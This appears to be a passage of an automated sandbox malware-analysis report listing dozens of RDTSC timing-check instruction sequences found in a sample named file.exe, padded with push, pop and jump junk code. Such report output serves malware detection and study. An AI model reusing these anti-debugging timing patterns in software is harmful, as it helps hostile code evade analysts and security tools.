                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF395 second address: BDF3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Ah 0x00000009 popad 0x0000000a jnc 00007EFD6CDBF89Ch 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007EFD6CDBF89Fh 0x00000017 jp 00007EFD6CDBF8A6h 0x0000001d pushad 0x0000001e jmp 00007EFD6CDBF8A4h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF50F second address: BDF51F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFD6CF3F376h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF51F second address: BDF525 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF525 second address: BDF561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFD6CF3F37Dh 0x00000008 jmp 00007EFD6CF3F380h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD6CF3F386h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF561 second address: BDF565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1114 second address: BE111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69A2 second address: BE69AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69AB second address: BE69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69AF second address: BE69C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B46 second address: BE5B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5CBE second address: BE5CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5F6E second address: BE5F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD6CF3F376h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007EFD6CF3F378h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFD6CF3F384h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5F9C second address: BE5FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5FA3 second address: BE5FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE60FE second address: BE612C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD6CDBF896h 0x0000000a jnl 00007EFD6CDBF896h 0x00000010 jmp 00007EFD6CDBF8A9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE612C second address: BE6132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6132 second address: BE6139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE50CC second address: BE50DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD6CF3F376h 0x0000000a ja 00007EFD6CF3F376h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE50DC second address: BE510E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 jmp 00007EFD6CDBF8A3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8420 second address: BE8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB621 second address: BEB62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB62C second address: BEB636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEAF84 second address: BEAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007EFD6CDBF89Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEAF91 second address: BEAF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB29A second address: BEB2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A5h 0x00000007 js 00007EFD6CDBF896h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB2BC second address: BEB2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Dh 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jns 00007EFD6CF3F376h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jbe 00007EFD6CF3F382h 0x0000001c jne 00007EFD6CF3F376h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB2E8 second address: BEB2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED5C5 second address: BED5D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007EFD6CF3F376h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED5D5 second address: BED5E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD6CDBF89Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3A19 second address: BF3A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5BEE second address: BA5BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5BF2 second address: BA5BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3FAE second address: BF3FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3FB2 second address: BF3FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49E3 second address: BF49E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49E7 second address: BF49F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49F0 second address: BF49F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49F8 second address: BF4A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7DE1 second address: BF7DFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007EFD6CDBF896h 0x0000000d jmp 00007EFD6CDBF89Fh 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F33 second address: BF7F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F37 second address: BF7F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F3D second address: BF7F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD6CF3F383h 0x0000000c jns 00007EFD6CF3F376h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007EFD6CF3F385h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8357 second address: BF8369 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD6CDBF89Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8369 second address: BF8381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CF3F384h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8381 second address: BF8396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF84FB second address: BF84FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF84FF second address: BF856B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007EFD6CDBF89Ah 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFD6CDBF8A2h 0x0000001a jmp 00007EFD6CDBF8A7h 0x0000001f popad 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007EFD6CDBF8A1h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF856B second address: BF85A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F387h 0x00000007 jmp 00007EFD6CF3F386h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85A0 second address: BF85A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85A4 second address: BF85C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007EFD6CF3F37Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85C0 second address: BF85C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBA87 second address: BFBA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBA91 second address: BFBAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 jmp 00007EFD6CDBF8A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBAC0 second address: BFBAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB269 second address: BFB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB26F second address: BFB28F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007EFD6CF3F376h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D41 second address: C01D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01EBB second address: C01ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F384h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02045 second address: C0204A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C028F7 second address: C028FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C028FC second address: C02902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02902 second address: C02918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD6CF3F37Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02918 second address: C0291C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0291C second address: C02936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007EFD6CF3F37Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02936 second address: C0293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0293A second address: C02951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F381h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C033C2 second address: C033C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0365A second address: C03660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DBC2 second address: C0DBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DBDE second address: C0DBE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CEC2 second address: C0CECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CECC second address: C0CED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D333 second address: C0D366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Dh 0x00000009 jmp 00007EFD6CDBF8A3h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007EFD6CDBF896h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D366 second address: C0D378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D378 second address: C0D38A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007EFD6CDBF896h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D38A second address: C0D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D645 second address: C0D675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD6CDBF8A4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D8F3 second address: C0D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E8B second address: C14E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E91 second address: C14EAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD6CF3F382h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14EAB second address: C14EB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD6CDBF896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14EB5 second address: C14EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C152BC second address: C152C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C152C0 second address: C152D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFD6CF3F376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C152D0 second address: C152EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14064 second address: C1406B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C19FBC second address: C19FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C19FC0 second address: C19FC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1D968 second address: C1D97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFD6CDBF89Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1D97B second address: C1D981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1D981 second address: C1D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1D988 second address: C1D98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2407A second address: C240A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007EFD6CDBF896h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD6CDBF8A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C240A0 second address: C240B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F37Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F36C second address: C2F370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F370 second address: C2F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFD6CF3F380h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD6CF3F37Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F037 second address: C2F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007EFD6CDBF896h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F049 second address: C2F04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F04D second address: C2F05C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
